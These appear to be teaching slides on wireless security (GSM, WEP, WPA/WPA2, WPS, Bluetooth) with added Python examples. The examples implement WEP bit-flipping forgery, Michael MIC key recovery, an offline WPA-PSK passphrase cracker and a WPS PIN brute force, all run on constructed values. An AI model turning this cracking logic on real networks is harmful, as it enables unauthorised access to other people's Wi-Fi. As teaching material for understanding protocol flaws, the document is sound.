Wireless Security
Related Chapters
• Chapter 15: Wireless Network Security
• Chapter 16: Wireless Sensor Network Security
• Chapter 17: Cellular Network Security
Wireless Technologies
• InfraRed
• Bluetooth (piconet, PAN)
• Wireless LAN
– 802.11a, 802.11b, 802.11g
• ZigBee – for home automation and industrial control
• WiMAX – for rural areas and metropolitan area networks (MAN)
• Mobile/cell phone networks – current and future generations
• Many more
Category                         Standard                          Range                                   Data rate
MAN (Metropolitan Area Network)  IEEE 802.16 WiMAX                 ~2 miles (non-line-of-sight)            4 Mbps (per user)
Wireless LAN                     IEEE 802.11 Wi-Fi                 ~100 feet                               150 Mbps
PAN (Personal Area Network)      (1) IEEE 802.15.4 ZigBee          ~30 feet                                (1) 0.25 Mbps
                                 (2) IEEE 802.15.1 Bluetooth                                               (2) 3 Mbps
Wireless Networks
• A general term for networks that communicate without wire lines.
• Two types of wireless networks:
– Cellular networks
– Wireless ad hoc networks
• Main difference
– Cellular needs a fixed infrastructure, whereas ad hoc does not.
Diagram: wireless network → cellular network | wireless ad hoc network
Cellular Networks
Figure 15.2 Cellular networking.
A cellular network comprises a fixed infrastructure and a number of mobile nodes. Mobile nodes connect to the fixed infrastructure through wireless links. They may move from within the range of one base station to outside its range, and into the ranges of other base stations.
Cellular Networks (2)
• Fixed infrastructure and mobile nodes.
• The fixed infrastructure serves as the backbone of a cellular network.
• Mobile nodes do not communicate with each other directly; all traffic goes through a base station.
• Requires careful topology design of the fixed infrastructure, since that topology is static and cannot adapt after deployment.
Main Cellular Technologies
• GSM:
– Each GSM mobile phone uses a pair of frequency channels, one for sending data and one for receiving data (frequency-division duplex).
– Time division multiple access (TDMA) lets several mobiles share one frequency pair.
• CDMA:
– Allows each mobile to transmit over the entire frequency spectrum at all times.
– The core algorithm of CDMA is how to extract the data of interest from the mixed signal.
• 4G LTE
Cellular Phone Network Security
• Confidentiality – such networks encrypt only the air link
• GSM
– Landlines (backhaul and core network) carry the traffic in the clear
– NO end-to-end CONFIDENTIALITY!
• User authentication – the main concern of operators
• It's all about money!
– WELL DONE, from a business perspective: the network always knows whom to bill
• Cell network authentication – detect & prevent rogue cell towers
– GSM authenticates only the subscriber to the network, never the network to the phone, which is what lets a rogue base station attract handsets
Rogue Cell Towers
Figure: locations of rogue cell towers identified by GSMK CryptoPhone users in August 2014 (map not reproduced)
WI-FI SECURITY
802.11 Wireless LANs (Wi-Fi)
• Specified by the IEEE 802.11 series of standards
– 802.11b was specified in 1999
– data rates range from 2 Mbit/s to 248 Mbit/s
• Two modes: access point (AP) mode or ad hoc mode
• Complications
– Medium access control in the data link layer
• Distributed: relies on the Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA) protocol
• Centralized: the base station broadcasts a beacon frame periodically and polls nodes to check whether they have data to send
802.11 Wireless LAN Modes
Figure 15.3 (a) A wireless network in AP mode; (b) a wireless network in ad hoc mode.
When a wireless LAN is working in AP mode, all communication passes through a base station, called an access point. The access point then passes the communication data to the destination node, if it is connected to the access point, or forwards the data to a router for further routing and relaying. When working in ad hoc mode, wireless LANs work in the absence of base stations. Nodes communicate directly with other nodes within their transmission range, without depending on a base station.
802.11 Commonly-used sub-protocols

                 802.11a        802.11b        802.11g        802.11n        802.11ac       802.11ad
Frequency        5 GHz          2.4 GHz        2.4 GHz        2.4 & 5 GHz    5 GHz          60 GHz (tri-band
                 (unlicensed)   (unlicensed)   (unlicensed)   (unlicensed)   (unlicensed)   products add 2.4 & 5 GHz)
Range            50 m           50 m           50 m           70 m           –              –
Max. data rate   54 Mbps        11 Mbps        54 Mbps        150 Mbps       866 Mbps       6.75 Gbps
Modulation       OFDM           DSSS           OFDM, others   OFDM           –              –
Year             1999           1999           2003           2009           2013           2012
802.11 Security Provision & Threats
Security Provision
• Access Control / Authentication
– Ensure that your wireless infrastructure is not used by unauthorized parties
• Data Integrity
– Ensure that your data packets are not modified in transit
• Confidentiality
– Ensure that the contents of your wireless traffic are not learned by eavesdroppers
Threats
• Interception
• Masquerading
• Hijacking
• DoS
• Tracking
• Theft
• Unauthorized access
• Insider attacks
• Device replacement
• Overpowering or jamming
• (tapping land lines!)
Security Protocols
• Wired Equivalent Privacy (WEP)
• Wi-Fi Protected Access (WPA)
• WPA2
• Key management for Wi-Fi in large organizations
Timeline:
WEP – 1999
WPA – 2003
WPA2 – 2004
Wired Equivalent Privacy (WEP)
• Defined by the original IEEE 802.11 standard (1999).
• Designed to protect link-level data for wireless transmission.
• Intended to provide confidentiality, access control, and data integrity.
• Meant to secure communication between a mobile device and an access point in an 802.11 wireless LAN.
• Implemented based on a shared secret key and the RC4 stream cipher.
Figure 15.4 WEP encryption and decryption.
WEP is implemented using a shared secret key and the RC4 stream cipher. WEP's encryption of a frame involves two operations: it first produces a CRC-32 checksum (the ICV) of the data, and then it encrypts the data and the checksum by XORing them with the RC4 keystream generated from the 24-bit IV concatenated with the shared key. The IV is sent in the clear with the frame, so the receiver regenerates the same keystream, decrypts, and recomputes the checksum.
Data Integrity Check
• WEP uses the CRC-32 checksum (the ICV) for message integrity
– CRC-32 is a common network technique to detect transmission errors
• Security flaws:
– CRC-32 is NOT a hash function, and it is not keyed!
– CRC is linear: CRC(x ⊕ y) = CRC(x) ⊕ CRC(y). (With the standard initial value and final XOR the relation is affine, off by a constant that depends only on the message length, so the correction is still computable without any key.)
– The linearity allows the attacker to modify a message without invalidating its CRC, and because RC4 is a stream cipher the change can be applied directly to the ciphertext:
• XOR the payload with some value ∆X, and then
• simply XOR the checksum with CRC(∆X)
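The two operations of Figure 15.4 and the ICV-correction attack above, as an added worked example (not code from the slides or from the handbook chapter they cite): a minimal WEP encrypt/decrypt in Python with a hand-written RC4 and zlib's CRC-32, and an attacker who flips payload bits on the ciphertext without the key. The 40-bit key, the IV and the payload are constructed for the demo; the key-ID byte and the 802.11 header are omitted.

```python
# Added example (not from the slides): WEP framing with RC4 + CRC-32 ICV,
# and the CRC-linearity bit-flipping attack performed without the key.
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher: KSA schedules the key, PRGA produces the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key, payload || ICV).  Key-ID byte omitted."""
    assert len(iv) == 3, "WEP IV is 24 bits"
    return iv + rc4(iv + key, payload + icv(payload))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (payload, icv_ok).  A real receiver drops the frame when icv_ok is False."""
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + key, body)
    payload, tag = plain[:-4], plain[-4:]
    return payload, tag == icv(payload)


def crc_correction(delta: bytes) -> bytes:
    """ICV correction for XORing delta into the payload.

    With the standard initial value and final XOR, CRC-32 is affine rather than
    strictly linear:  crc(x ^ d) == crc(x) ^ crc(d) ^ crc(0^len).  The extra term
    depends only on the length, so it is still computable without any key.
    """
    d = zlib.crc32(delta) & 0xFFFFFFFF
    z = zlib.crc32(bytes(len(delta))) & 0xFFFFFFFF
    return struct.pack("<I", d ^ z)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker side: XOR delta into the encrypted payload and fix up the
    encrypted ICV.  No key is needed: RC4 is a stream cipher, so an XOR on
    the ciphertext is the same XOR on the plaintext."""
    iv, body = frame[:3], frame[3:]
    mask = delta + crc_correction(delta)
    assert len(mask) == len(body), "delta must cover the whole payload"
    return iv + bytes(c ^ m for c, m in zip(body, mask))


def demo():
    """Constructed values: 40-bit key, IV, and a payload the attacker can partly guess."""
    key = bytes.fromhex("0102030405")
    iv = bytes.fromhex("102030")
    original = b"PAY 100 USD TO ALICE"
    wanted = b"PAY 900 USD TO ALICE"      # the attacker only needs to know which bits to flip
    frame = wep_encrypt(key, iv, original)
    delta = bytes(a ^ b for a, b in zip(original, wanted))
    forged = flip_bits(frame, delta)
    return wep_decrypt(key, forged)        # -> (b'PAY 900 USD TO ALICE', True)


if __name__ == "__main__":
    print(demo())
```

The forged frame passes the receiver's ICV check even though the attacker never saw the key or the plaintext of the untouched bytes; a keyed MAC (such as the CCMP MIC introduced later) is what makes this impossible.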
Major Known Problems with WEP
• Default is insecure
• Inadequate key management leads to possible exploitation of
– weak encryption/authentication/integrity (such as the short 24-bit IV, the non-cryptographic CRC, etc.)
– Static keys
– Shared keys
– Weaknesses of RC4
• One-sided authentication only (the AP is not authenticated by mobile devices)
• IP addresses can be forged!
WEP → WPA → WPA2
• Wi-Fi Protected Access (WPA) – targets both enterprise and consumers
– What improvements does WPA provide over WEP?
– Uses the Extensible Authentication Protocol (EAP) framework to conduct authentication (Enterprise mode)
• WPA2 – AES-CCMP mandatory; TKIP optional, kept only for backward compatibility with WPA clients
– Supports fast roaming of wireless clients migrating between access points (PMK caching and pre-authentication)
• Useful for time-sensitive applications
WPA (Wi-Fi Protected Access)
• Published in 2003 by the Wi-Fi Alliance
– Based on an early version (draft 3) of the IEEE 802.11i standard
• Three major objectives:
– Address WEP's problems
– Make existing WEP hardware also support WPA
– Ensure WPA is compatible with the 802.11i standard
• Still uses the RC4 stream cipher for encryption
• Based on TKIP (Temporal Key Integrity Protocol)
WPA - Modes of Operation
• PSK (Pre-Shared Key, "Personal") mode:
– A shared secret (the passphrase) is used for authentication to the access point
– No need for an authentication server
– Vulnerable to offline dictionary attacks: anyone who captures one 4-way handshake can test passphrase guesses without ever talking to the AP again
• Enterprise mode:
– Requires an authentication server – RADIUS
– Uses 802.1X/EAP for authentication, with per-user credentials
Temporal Key Integrity Protocol
• Responsible for generating the encryption key, encrypting the message and verifying its integrity
• Dynamically changes the key as the system is used
• Encryption key is unique for every client
• Combined with a larger IV to defeat known-plaintext attacks
– 48-bit IV (packet sequence number)
– WEP = 24-bit IV
Message Integrity Check (Michael)
• Uses the Michael algorithm to generate a Message Integrity Code (MIC) – 8 bytes in length
– Used to enforce data integrity
• The MIC is inserted in the TKIP packet
• The sender and the receiver each compute the MIC and then compare.
– A MIC mismatch implies the data was manipulated
– Detects packet content alteration due to transmission error or purposeful manipulation
• Includes a frame counter (the TKIP sequence counter) to prevent replay attacks
• More secure than CRC-32, but deliberately lightweight (about 20 bits of security) so that it could run on WEP-era hardware
Attacks on WPA
• Dictionary attack on pre-shared key mode
• Michael algorithm vulnerability
– Attacker creates a message, attaches a 64-bit binary string as a MIC, and tries to find the correct MIC without knowing the secret key
– Uses a differential cryptanalysis attack to find the correct MIC
– Michael is also invertible: from one plaintext and its MIC the MIC key can be computed back
• Denial of service attack – if WPA equipment sees two packets with invalid MICs within 60 seconds, then:
• All clients are disassociated.
• All activity is stopped for one minute (TKIP countermeasures).
• So two malicious packets per minute are enough to stop a wireless network.
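The MIC computation described under "Message Integrity Check (Michael)" and the invertibility used by the attacks above, as an added worked example (not code from the slides): Michael in Python, checked against the 802.11i test vector (all-zero key, empty message gives 82925c1ca1d130b8), together with the inverse block function that recovers the MIC key from a single known message/MIC pair. The key, addresses and payload in demo() are constructed.

```python
# Added example (not from the slides): the Michael MIC used by TKIP, and the
# inverse that recovers the MIC key from one known message/MIC pair.
import struct

MASK = 0xFFFFFFFF


def rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def xswap(x):
    """Swap the two bytes inside each 16-bit half."""
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def b_func(l, r):
    """Michael block function (additions mod 2^32)."""
    r ^= rotl(l, 17)
    l = (l + r) & MASK
    r ^= xswap(l)
    l = (l + r) & MASK
    r ^= rotl(l, 3)
    l = (l + r) & MASK
    r ^= rotr(l, 2)
    l = (l + r) & MASK
    return l, r


def b_inverse(l, r):
    """Every step of b_func is reversible, which is why Michael is not a real MAC."""
    l = (l - r) & MASK
    r ^= rotr(l, 2)
    l = (l - r) & MASK
    r ^= rotl(l, 3)
    l = (l - r) & MASK
    r ^= xswap(l)
    l = (l - r) & MASK
    r ^= rotl(l, 17)
    return l, r


def michael_pad(msg: bytes) -> bytes:
    """Append 0x5a, then 4 to 7 zero bytes so the length is a multiple of 4."""
    msg += b"\x5a" + b"\x00" * 4
    return msg + b"\x00" * ((4 - len(msg) % 4) % 4)


def michael(key: bytes, msg: bytes) -> bytes:
    """64-bit MIC over msg under a 64-bit key (two little-endian 32-bit words)."""
    l, r = struct.unpack("<II", key)
    for (m,) in struct.iter_unpack("<I", michael_pad(msg)):
        l ^= m
        l, r = b_func(l, r)
    return struct.pack("<II", l, r)


def recover_key(msg: bytes, mic: bytes) -> bytes:
    """Run Michael backwards from a known (msg, mic) pair to obtain the key."""
    l, r = struct.unpack("<II", mic)
    words = [m for (m,) in struct.iter_unpack("<I", michael_pad(msg))]
    for m in reversed(words):
        l, r = b_inverse(l, r)
        l ^= m
    return struct.pack("<II", l, r)


def tkip_mic_input(da: bytes, sa: bytes, priority: int, data: bytes) -> bytes:
    """TKIP runs Michael over DA || SA || priority || 3 zero bytes || MSDU data."""
    return da + sa + bytes([priority, 0, 0, 0]) + data


def demo():
    key = bytes.fromhex("d55e100510128986")                       # constructed MIC key
    msg = tkip_mic_input(bytes.fromhex("ffffffffffff"),           # constructed DA (broadcast)
                         bytes.fromhex("020000000001"),           # constructed SA
                         0, b"constructed payload")
    mic = michael(key, msg)
    return recover_key(msg, mic) == key                           # -> True
```

Because the key falls out of one plaintext/MIC pair, anything that lets an attacker decrypt a single TKIP packet (which is what the chopchop-style attacks on WPA do) also hands them the MIC key for that direction; Michael's only defence is the countermeasure lockout listed above.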
WPA2
• A long-term solution specified by IEEE 802.11i
• Uses the same authentication process, 4-way handshake, and key hierarchy as WPA
• Replaces TKIP with the Advanced Encryption Standard (AES) CCMP protocol
– AES in Counter Mode for encryption
– AES in Cipher Block Chaining-Message Authentication Code (CBC-MAC) for integrity checking
• Requires replacement of WEP-era hardware (AES is too heavy for the RC4-only chips)
Key Generation
• Same key hierarchy as WPA
– 256-bit pairwise master key (PMK), derived from the passphrase and SSID in PSK mode or delivered by the 802.1X server in Enterprise mode
– Pairwise transient key (PTK): 384 bits for CCMP in each session (512 bits for TKIP, whose fourth 128-bit block holds the two Michael keys)
• Derived with a pseudorandom function from the PMK, SMAC, SNonce, AMAC and ANonce
• The nonces are exchanged in the 4-way handshake protocol
• The CCMP PTK is divided into three 128-bit keys:
– Two (KCK and KEK) protect the handshake messages between STA and AP
– One (TK) is the session key for AES-128
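The key hierarchy above and the offline dictionary attack on PSK mode mentioned under "WPA - Modes of Operation", as one added worked example (not code from the slides): the PMK is PBKDF2-HMAC-SHA1 over the passphrase and SSID, the PTK comes from the 802.11i PRF over the PMK, both MAC addresses and both nonces, and the handshake MIC is HMAC-SHA1 under the first 128 bits of the PTK. The SSID, passphrase, MAC addresses, nonces, wordlist and EAPOL message body are all constructed for the demo; the "sniffed" MIC is computed by the legitimate station inside demo() rather than read from a capture.

```python
# Added example (not from the slides): 802.11i key hierarchy in PSK mode and
# the offline dictionary attack it permits.
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK mode: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, amac, smac, anonce, snonce, nbytes=48):
    """PTK = PRF(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    48 bytes for CCMP: KCK (16) || KEK (16) || TK (16).  TKIP asks for 64 bytes."""
    data = min(amac, smac) + max(amac, smac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """MIC on handshake messages 2-4 (CCMP): HMAC-SHA1 under the KCK, truncated to 128 bits."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, amac, smac, anonce, snonce, eapol_mic_zeroed, captured_mic):
    """Offline attack: everything except the passphrase was sniffed from one 4-way handshake.
    Each guess costs one PBKDF2 (4096 HMACs) plus a PRF; nothing is sent to the AP."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, amac, smac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), captured_mic):
            return candidate
    return None


def demo():
    ssid = "lab-net"                                  # constructed
    passphrase = "correct horse"                     # constructed (8-63 chars, as the standard requires)
    amac = bytes.fromhex("020000000001")              # AP MAC, constructed
    smac = bytes.fromhex("020000000002")              # station MAC, constructed
    anonce = hashlib.sha256(b"anonce").digest()       # stand-ins for the 32-byte random nonces
    snonce = hashlib.sha256(b"snonce").digest()
    msg2 = b"constructed EAPOL-Key message 2 with its MIC field zeroed"

    # The legitimate station computes the MIC that the attacker later sees on the air.
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), amac, smac, anonce, snonce)[:16]
    sniffed_mic = eapol_mic(kck, msg2)

    wordlist = ["password", "12345678", "correct horse", "letmein99"]   # constructed
    return crack_psk(wordlist, ssid, amac, smac, anonce, snonce, msg2, sniffed_mic)  # -> "correct horse"
```

The 4096-iteration PBKDF2 is the only cost per guess, which is why a long random passphrase (or Enterprise mode with per-user credentials) is the actual defence; the AP cannot rate-limit an attack it never sees.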
CCMP Encryption and MIC
• Encryption (AES in counter mode; K is the temporal key, Ctr_0 is built from the packet number and sender address):
C_i = AES-128_K(Ctr_0 + i) ⊕ M_i,   i = 1, 2, …, k
• Authentication and integrity check (CBC-MAC over the same blocks, plus the header fields as associated data):
X_0 = 0^128
X_i = AES-128_K(X_{i-1} ⊕ M_i),   i = 1, 2, …, k
MIC = first 64 bits of X_k, XORed with AES-128_K(Ctr_0) before transmission
Flawed WPS
• Wi-Fi Protected Setup (WPS) is a simplified setup for Wi-Fi security with a hard-wired 8-digit PIN
– the 8th digit is a checksum, so only 7 digits are effective
• Flaws with the "external registrar" method:
– When the client-supplied PIN fails during configuration, the router sends back an EAP-NACK at a point in the exchange (after M4 versus after M6) that lets the client infer whether the 1st half of the PIN is correct
– Allows an evil client to reduce the number of attempts needed to brute-force the PIN: from 10^8 to 10^4 + 10^3 = 11,000 attempts in total (succeeds within a few hours)
• Ref:
– US-CERT Vulnerability Note VU#723755
– http://code.google.com/p/reaver-wps/
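The search-space reduction above, as an added worked example (not code from the slides or from the Reaver tool they cite): the WPS PIN checksum digit, a simulated registrar that answers as the flawed protocol does (NACK after M4 when the first half is wrong, NACK after M6 when only the second half is wrong), and the two-phase brute force that needs at most 10^4 + 10^3 attempts. The registrar class and its reply strings are constructed stand-ins for the EAP exchange, not a protocol implementation.

```python
# Added example (not from the slides): WPS PIN checksum and the split-PIN
# brute force enabled by the external-registrar NACK oracle.


def wps_checksum(first7: int) -> int:
    """8th PIN digit: weighted digit sum (3,1,3,1,3,1,3 from the left) over the first seven."""
    acc = 0
    d = first7
    while d:
        acc += 3 * (d % 10)
        d //= 10
        acc += d % 10
        d //= 10
    return (10 - acc % 10) % 10


class Registrar:
    """Simulated AP-side registrar (the victim).  Responds the way the flawed
    exchange does: a wrong first half fails at M4, a wrong second half at M6."""

    def __init__(self, pin: str):
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK after M4"   # leaks: first half wrong
        if pin[4:] != self.pin[4:]:
            return "NACK after M6"   # leaks: first half right, second half wrong
        return "M7"                  # success: registrar hands over the network credentials


def brute_force(reg: Registrar) -> str:
    # Phase 1: find the first four digits (at most 10^4 attempts).  The
    # second half is irrelevant here, so any four digits will do.
    for half1 in range(10_000):
        if reg.try_pin(f"{half1:04d}0000") != "NACK after M4":
            break
    else:
        raise RuntimeError("registrar never accepted a first half")
    # Phase 2: three free digits plus the checksum digit (at most 10^3 attempts).
    for tail in range(1000):
        pin = f"{half1:04d}{tail:03d}{wps_checksum(half1 * 1000 + tail)}"
        if reg.try_pin(pin) == "M7":
            return pin
    raise RuntimeError("no PIN found")


def demo():
    real = "9999999"                               # worst case: last candidate in both phases
    real += str(wps_checksum(int(real)))           # constructed PIN "99999995"
    reg = Registrar(real)
    return brute_force(reg), reg.attempts          # -> ("99999995", 11000)
```

Without the oracle the attacker would have to submit whole PINs, 10^7 of them in the worst case; the split NACK turns a product of the two halves into a sum. Disabling the PIN method (or at least rate-limiting and locking out after a few failures, which many routers at the time did not do) is the practical mitigation.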
Common Sense Security Measures
• Don't use wireless unless you have to
• Proper configuration of the AP (incl. changing default passwords, limiting physical access, etc.)
• Turn on encryption with WPA2
• Limit the radio coverage
• Mask/disable SSID broadcasting if possible (the SSID still appears in probe and association frames, so this only stops casual discovery)
• Set up a list of acceptable MAC addresses (MAC addresses are sent in the clear and are trivially spoofed, so this only stops casual access)
• Rotate keys regularly if feasible
• Turn off the radio when not in use
LI-FI (LIGHT FIDELITY) --- THE NEXT WAVE ?
Features of Li-Fi
• Visible light communication – line of sight (typically)
• Using light-emitting diodes (LEDs)
• High-speed switching at nanosecond rates
• Data rates > 10 Gbps!
– 250 times as fast as typical broadband
• Weaving the future "Internet of Things"
• Expected to be more secure than Wi-Fi (light does not pass through walls, so an eavesdropper has to be in the room)
• Transmitting data while illuminating the room!
BLUETOOTH SECURITY
BlueTooth (Piconet)
• First proposed by Intel, Ericsson, IBM, Toshiba & Nokia in 1998.
• Self-configured and self-organized ad hoc wireless networks
– low power consumption
– short range (1-50 meters)
• Essentially a mini wireless network between communicating nodes, called a piconet.
– allows one master device to interconnect with up to seven active slave devices
Security Concerns
• Authentication and encryption is provided at the Link Manager layer.
• The PIN is translated into a 128 bit link key which is used for authentication.
• After authentication the radios will settle on a suitable length encryption key to be used.
• Bluetooth relies on PIN codes to establish trusted relationships between devices.
Figure: Bluetooth key generation (diagram not reproduced)
Figure: Bluetooth authentication (diagram not reproduced)
Encryption Modes
• Mode 1: No encryption on any traffic
• Mode 2: Broadcast traffic unencrypted; individual (point-to-point) traffic encrypted with individual link keys
• Mode 3: All traffic encrypted with the master link key
Attacks on Bluetooth
General attacks
• Attack on authentication
– due to PIN weakness: authentication is based on a PIN (8-128 bits)
– a poorly chosen (short or default) PIN is easy to guess
• Attack on encryption
– Bluetooth supports encryption, but it is off by default, and the PIN is 0000 by default on many devices
– known-plaintext attack
– stealing the unit key
• Attack on communication
– steal information about valid users' devices and use it to impersonate the user
Other attacks
• Bluejacking
– discover nearby devices and send unsolicited messages
– spam for Bluetooth devices
• Bluesnarfing
– break into a Bluetooth-enabled phone and copy anything stored in its memory
• Denial-of-service (DoS) attacks
– flood a Bluetooth device with so many frames that it is unable to communicate
• The Cabir worm
– seeks out and infects Bluetooth devices, but has to be manually accepted and installed
• Backdooring
– allows the attacker to monitor activity and exploit services without the owner's knowledge